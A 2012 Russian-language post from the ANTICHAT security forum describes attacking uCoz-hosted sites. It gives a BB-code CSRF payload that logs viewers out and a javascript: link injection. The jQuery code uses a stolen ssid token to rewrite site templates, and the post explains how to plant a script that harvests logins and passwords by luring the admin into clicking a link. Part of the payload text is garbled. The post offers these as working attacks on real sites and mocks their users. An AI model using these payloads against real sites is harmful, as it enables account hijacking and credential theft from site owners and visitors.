HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 24.10.2012, 17:20
WendM
Познающий
Регистрация: 29.01.2012
Сообщений: 44
Провел на форуме:
11466

Репутация: 3
По умолчанию

Существует такая система для клепания сайтов под названием uCoz. Пользуются ей в основном те, кто не знаком с такими окуенно сложными вещами как Joomla, DLE и пр. — школота. Но прогуливаясь по просторам интернета часто натыкаешься на эти чудо-сайты. И иногда просто хочется взять и развидеть это го*но. Собственно пару способов это сделать можно узнать под катом.

Первая уязвимость: BB код

Сама уязвимость заключается в возможности «подгрузки» не картинки, а чего-нибудь другого. К примеру страницы выхода из аккаунта, которая располагается по адресу адрес_сайта/index/10:
Код:
[I M G]http://адрес_сайта/index/10?.jpg[/I M G]
Кидаем себе в подпись или, что лучше, кидаем в чат и наслаждаемся зрелищем. Кучка школьников наверняка где-то пробует войти в свой профиль, тут же выходит из него и ловит окуенные баттхёрты ^__^.

Вторая уязвимость: BB код [U R L]

Учитывая, что на козе хостятся более миллиона сайтов смешной является уязвимость, которая даёт возможность использовать псевдопротокол «javascript:». Что смешно, не проверяется даже является ли строка ссылкой вообще >_');]Не нажимать[/U R L][/CODE] Собственно, а как это использовать?

Используя jQuery конструкции вида
Код:
/*Получаем исходник шаблона страницы*/

$.get('/tmpls/?a=tmpl;m=3;t=3', function (o) {

    /*Делаем POST запрос с новыми параметрами*/

    $.post('/tmpls/', {

        //как угодно изменяем шаблон до этой функции или прямо тут через регэкспы

        //а далее подставляем нужные параметры

        tmpl: $('textarea[name="tmpl"]', o).val(),

        a: 'tmpl',

        t: '3',

        m: '3',

        tt: '1',

        ssid: $('input[name="ssid"]', o).val()

    });

});

/*Вообщем обычные GET и POST запросы с нужными вам параметрами*/
у вас есть также возможность удалённо с помощью скрипта, который вы внедрите, изменять шаблоны различных страниц сайта. Это, можно считать, отдельная уязвимость. Так вот, вы можете внедрить в любой шаблон скрипт по отправке полей «имя» и «пароль» по нажатию на кнопку «вход». Для этого киньте админу в личку скрипт, для установки скрипта, собирающего пароли на сайт. Подождите пока он нажмёт на ссылку. И собирайте логины. Уже через логины можно получить доступ к сайтам на укозе конкретных пользователей, а также к другим (возможно) сайтам на которых пользователь зареген через их почту.

В тегах U R L и I M G убрать пробелы.

Автор статьи : TickHack
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.